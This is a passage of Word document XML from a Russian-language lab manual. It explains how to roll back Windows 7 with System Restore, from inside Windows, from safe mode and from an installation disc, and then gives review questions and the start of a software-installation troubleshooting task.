                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2023585" cy="802911"/>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Появится окно с подготовкой к восстановлению. Затем компьютер перезагрузиться и появится сообщение о том, что»Восстановление системы выполнено успешно».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2133750" cy="843669"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Рисунок 27253" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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53" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image236.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId166" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2140089" cy="846175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если это не помогло решить вашу проблему, то попробуйте сделать откат к другой точке. На этом с первым способом можно закончить</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сделать откат настроек и системных файлов можно с безопасного режима, когда например Windows не загружается в обычном режиме. Были случаи, когда меня такой способ здорово выручал.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для начала нам нужно зайти в безопасный режима. Ну а если вы пропустили ссылку, то пишу в двух словах, как войти в безопасный режим Windows 7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Перезагрузите компьютер и как только он начнет включатся, нажимайте </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>F8</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Появится черное окно с дополнительными вариантами загрузки. Выбираем «Безопасный режим» и нажимаем «Enter».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2301891" cy="1396800"/>
            <wp:effectExtent l="19050" t="0" r="3159" b="0"/>
            <wp:docPr id="24" name="Рисунок 27363" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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3" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image237.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId167" cstate="print">
                      <a:lum bright="40000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2301989" cy="1396860"/>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Ждем пока компьютер загрузится в безопасном режиме. Дальше все действия почти не отличаются от восстановления из-под Windows, но напишу еще раз, так на всякий случай.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Жмем пуск и вводим «восстано…», запускаем утилиту «Восстановление системы».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1586550" cy="1692099"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="Рисунок 27364" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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4" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image238.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId168" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1590351" cy="1696153"/>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 xml:space="preserve">Так-как я только что делал откат системы, то у меня появился пункт с возможностью отменить восстановление. Выбираем «Выбрать другую точку восстановления» и нажимаем «Далее» (у вас наверное нужно будет нажать просто </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1622550" cy="1310627"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="Рисунок 27365" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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5" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image239.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId169" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1628283" cy="1315258"/>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 xml:space="preserve">Выбираем точку для отката и нажимаем «Далее». </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1651350" cy="1331735"/>
            <wp:effectExtent l="19050" t="0" r="6000" b="0"/>
            <wp:docPr id="27" name="Рисунок 27366" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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6" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image240.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId170" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1652053" cy="1332302"/>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 xml:space="preserve">Нажимаем на кнопку «Готово». </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1837148" cy="1476000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="Рисунок 27367" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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7" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image241.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId171" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1836836" cy="1475750"/>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На еще одно предупреждение отвечаем «Да».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компьютер будет перезагружен и включится уже в нормальном режиме. Конечно же, если откат к предыдущим настройкам помог решить вашу проблему с загрузкой системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Этот способ я оставил на десерт, потому-что здесь понадобится загрузочный диск с Windows 7. Но у этого способа есть и плюсы. Например, можно сделать откат, когда даже безопасный режим не работает, короче говоря в самых тяжелых случаях :).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В окне с выбором языка нажимаем «Далее».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дальше выбираем «Восстановление системы».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1795350" cy="1085173"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="Рисунок 27448" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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8" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image242.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId172" cstate="print">
                      <a:lum bright="40000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1797773" cy="1086638"/>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Пойдет поиск установленных систем. Если у вас их больше чем одна, то выбираем нужную и нажимаем «Далее».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Затем выбираем «Восстановление системы». Дальше весь процесс не отличается от первых двух способов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1543350" cy="937284"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="Рисунок 27449" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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9" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image243.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId173" cstate="print">
                      <a:lum bright="40000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1544188" cy="937793"/>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t xml:space="preserve">Нажимаем «Далее». </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1644150" cy="998500"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="Рисунок 27450" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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50" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image244.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId174" cstate="print">
                      <a:lum bright="40000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1646403" cy="999868"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбираем точку для отката и жмем «Далее»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1860150" cy="1129678"/>
            <wp:effectExtent l="19050" t="0" r="6750" b="0"/>
            <wp:docPr id="27232" name="Рисунок 27451" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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51" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image245.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId175" cstate="print">
                      <a:lum bright="40000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1866113" cy="1133299"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>В следующем окне нажимаем кнопку «Готово» и на предупреждение отвечаем «Да». Ждем пока закончится процесс восстановления и нажимаем «Перезагрузка».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вытягиваем диск с привода, и компьютер должен загрузится обычным способом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое восстановление системы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Теряются ли личные данные при восстановлении системы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Перечислите способы запуска восстановления системы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 2 Решение ситуационных задач на выявление и устранение проблем установки программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> научиться решать ситуационные задачи на выявление и устранение проблем установки программного обеспечения отраслевой направленности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устранение общих неполадок с установкой</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> программного обеспечения отраслевой направленности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся рекомендации по установке и примерный текст консультации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId176" w:history="1">
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>1. Очистка папки Temp и перезапуск компьютера</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ОС</w:t>
      </w:r>
      <w:hyperlink r:id="rId177" w:history="1">
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
